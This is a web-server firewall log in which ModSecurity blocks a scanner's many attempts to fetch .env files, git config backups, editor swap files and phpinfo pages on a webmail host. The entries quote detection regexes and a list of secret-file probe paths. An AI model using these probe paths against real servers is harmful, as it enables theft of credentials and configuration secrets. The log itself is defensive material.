[Tue May 26 13:30:13.842338 2026] [security2:error] [pid 512745:tid 512922] [client 45.148.10.95:19350] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/.env.swp"] [unique_id "ahVTDXKSB_s2CvZg7xNssQAAATk"]
[Tue May 26 13:30:14.099663 2026] [security2:error] [pid 512745:tid 512897] [client 45.148.10.95:19390] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/.git/config.bak"] [unique_id "ahVTDnKSB_s2CvZg7xNsugAAASA"]
[Tue May 26 13:30:14.104241 2026] [security2:error] [pid 512344:tid 512570] [client 45.148.10.95:19274] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/.git/config.old"] [unique_id "ahVTDsbElyei4S77DQcF9wAAAGA"]
[Tue May 26 13:30:14.170639 2026] [security2:error] [pid 512344:tid 512480] [client 45.148.10.95:19414] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/.env~"] [unique_id "ahVTDsbElyei4S77DQcF-AAAAAY"]
[Tue May 26 13:30:14.257906 2026] [security2:error] [pid 512344:tid 512594] [client 45.148.10.95:19402] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/.git/config~"] [unique_id "ahVTDsbElyei4S77DQcF-QAAAHg"]
[Tue May 26 13:30:15.396018 2026] [security2:error] [pid 512344:tid 512510] [client 45.148.10.95:19336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/.wp-config.php.swp"] [unique_id "ahVTD8bElyei4S77DQcGGwAAACQ"]
[Tue May 26 13:30:15.471972 2026] [security2:error] [pid 512344:tid 512557] [client 45.148.10.95:19402] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/ADMIN/.env"] [unique_id "ahVTD8bElyei4S77DQcGHwAAAFM"]
[Tue May 26 13:30:15.487562 2026] [security2:error] [pid 512745:tid 512959] [client 45.148.10.95:19318] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/API/.env"] [unique_id "ahVTD3KSB_s2CvZg7xNs9AAAAV4"]
[Tue May 26 13:30:15.617826 2026] [security2:error] [pid 512344:tid 512560] [client 45.148.10.95:19414] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/Api/.env"] [unique_id "ahVTD8bElyei4S77DQcGJAAAAFY"]
[Tue May 26 13:30:15.622535 2026] [security2:error] [pid 512745:tid 512933] [client 45.148.10.95:19300] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/APP/.env"] [unique_id "ahVTD3KSB_s2CvZg7xNs_AAAAUQ"]
[Tue May 26 13:30:15.623301 2026] [security2:error] [pid 512344:tid 512536] [client 45.148.10.95:19394] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/BACK/.env"] [unique_id "ahVTD8bElyei4S77DQcGJgAAAD4"]
[Tue May 26 13:30:15.623512 2026] [security2:error] [pid 512745:tid 513000] [client 45.148.10.95:19280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/BACKEND/.env"] [unique_id "ahVTD3KSB_s2CvZg7xNs_QAAAYc"]
[Tue May 26 13:30:15.724708 2026] [security2:error] [pid 512745:tid 512905] [client 45.148.10.95:19350] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/BE/.env"] [unique_id "ahVTD3KSB_s2CvZg7xNs_gAAASg"]
[Tue May 26 13:30:15.766949 2026] [security2:error] [pid 512745:tid 512895] [client 45.148.10.95:19430] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/Be/.env"] [unique_id "ahVTD3KSB_s2CvZg7xNs_wAAAR4"]
[Tue May 26 13:30:15.775553 2026] [security2:error] [pid 512344:tid 512483] [client 45.148.10.95:19402] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/Backend/.env"] [unique_id "ahVTD8bElyei4S77DQcGKAAAAAk"]
[Tue May 26 13:30:16.273047 2026] [security2:error] [pid 512745:tid 512916] [client 45.148.10.95:19300] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVTEHKSB_s2CvZg7xNtFgAAATM"]
[Tue May 26 13:30:16.412664 2026] [security2:error] [pid 512344:tid 512495] [client 45.148.10.95:19458] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/admin-app/.env"] [unique_id "ahVTEMbElyei4S77DQcGPgAAABU"]
[Tue May 26 13:30:16.489429 2026] [security2:error] [pid 512745:tid 512896] [client 45.148.10.95:19316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/admin/phpinfo.php"] [unique_id "ahVTEHKSB_s2CvZg7xNtJgAAAR8"]
[Tue May 26 13:30:16.509195 2026] [security2:error] [pid 512745:tid 512961] [client 45.148.10.95:19430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/admin_phpinfo.php"] [unique_id "ahVTEHKSB_s2CvZg7xNtJwAAAWA"]
[Tue May 26 13:30:16.518873 2026] [security2:error] [pid 512344:tid 512487] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTEMbElyei4S77DQcGMAAAAA0"]
[Tue May 26 13:30:16.541101 2026] [security2:error] [pid 512344:tid 512580] [client 45.148.10.95:19432] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/administrator/.env"] [unique_id "ahVTEMbElyei4S77DQcGRgAAAGo"]
[Tue May 26 13:30:16.565262 2026] [security2:error] [pid 512745:tid 512950] [client 45.148.10.95:19294] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/api-backend/.env"] [unique_id "ahVTEHKSB_s2CvZg7xNtKAAAAVU"]
[Tue May 26 13:30:16.576090 2026] [security2:error] [pid 512745:tid 512904] [client 45.148.10.95:19350] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/api-node/.env"] [unique_id "ahVTEHKSB_s2CvZg7xNtKQAAASc"]
[Tue May 26 13:30:16.590702 2026] [security2:error] [pid 512745:tid 512878] [client 45.148.10.95:19468] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/api/.env"] [unique_id "ahVTEHKSB_s2CvZg7xNtKwAAAQ0"]
[Tue May 26 13:30:16.688417 2026] [security2:error] [pid 512344:tid 512591] [client 45.148.10.95:19432] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/api/info.php"] [unique_id "ahVTEMbElyei4S77DQcGTgAAAHU"]
[Tue May 26 13:30:16.757877 2026] [security2:error] [pid 512344:tid 512535] [client 45.148.10.95:19402] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/api/phpinfo.php"] [unique_id "ahVTEMbElyei4S77DQcGUAAAAD0"]
[Tue May 26 13:30:16.873224 2026] [security2:error] [pid 512745:tid 512947] [client 45.148.10.95:19294] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/apis/.env"] [unique_id "ahVTEHKSB_s2CvZg7xNtPQAAAVI"]
[Tue May 26 13:30:16.939997 2026] [security2:error] [pid 512344:tid 512597] [client 45.148.10.95:19334] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/app/.env"] [unique_id "ahVTEMbElyei4S77DQcGWwAAAHs"]
[Tue May 26 13:30:17.131943 2026] [security2:error] [pid 512344:tid 512540] [client 45.148.10.95:19274] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/application/.env"] [unique_id "ahVTEcbElyei4S77DQcGYgAAAEI"]
[Tue May 26 13:30:17.143949 2026] [security2:error] [pid 512745:tid 512960] [client 45.148.10.95:19318] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/apps/.env"] [unique_id "ahVTEXKSB_s2CvZg7xNtUwAAAV8"]
[Tue May 26 13:30:17.443130 2026] [security2:error] [pid 512745:tid 512951] [client 45.148.10.95:19318] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/back-api/.env"] [unique_id "ahVTEXKSB_s2CvZg7xNtagAAAVY"]
[Tue May 26 13:30:17.454831 2026] [security2:error] [pid 512745:tid 512992] [client 45.148.10.95:19594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/back-end/.env"] [unique_id "ahVTEXKSB_s2CvZg7xNtawAAAX8"]
[Tue May 26 13:30:17.466592 2026] [security2:error] [pid 512745:tid 512991] [client 45.148.10.95:19448] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/back/.env"] [unique_id "ahVTEXKSB_s2CvZg7xNtbQAAAX4"]
[Tue May 26 13:30:17.471523 2026] [security2:error] [pid 512745:tid 512999] [client 45.148.10.95:19476] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/backend-api/.env"] [unique_id "ahVTEXKSB_s2CvZg7xNtbwAAAYY"]
[Tue May 26 13:30:17.483187 2026] [security2:error] [pid 512344:tid 512474] [client 45.148.10.95:19414] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/backend/.env"] [unique_id "ahVTEcbElyei4S77DQcGcwAAAAA"]
[Tue May 26 13:30:17.602724 2026] [security2:error] [pid 512344:tid 512577] [client 45.148.10.95:19274] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/be/.env"] [unique_id "ahVTEcbElyei4S77DQcGdwAAAGc"]
[Tue May 26 13:30:17.604785 2026] [security2:error] [pid 512745:tid 512944] [client 45.148.10.95:19594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/backup/.env"] [unique_id "ahVTEXKSB_s2CvZg7xNteAAAAU8"]
[Tue May 26 13:30:17.619354 2026] [security2:error] [pid 512745:tid 512913] [client 45.148.10.95:19448] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/beta/.env"] [unique_id "ahVTEXKSB_s2CvZg7xNteQAAATA"]
[Tue May 26 13:30:17.719400 2026] [security2:error] [pid 512745:tid 512953] [client 45.148.10.95:19546] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/client/.env"] [unique_id "ahVTEXKSB_s2CvZg7xNtgAAAAVg"]
[Tue May 26 13:30:17.754602 2026] [security2:error] [pid 512745:tid 512908] [client 45.148.10.95:19594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.ndequipments.com"] [uri "/___proxy_subdomain_webmail/cms/.env"] [unique_id "ahVTEXKSB_s2CvZg7xNthwAAASs"]
[Tue May 26 13:30:17.804683 2026] [security2:error] [pid 512344:tid 512536] [client 45.148.10.95:19414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.ndequipments.com"] [uri "/config.php"] [unique_id "ahVTEcbElyei4S77DQcGfwAAAD4"]
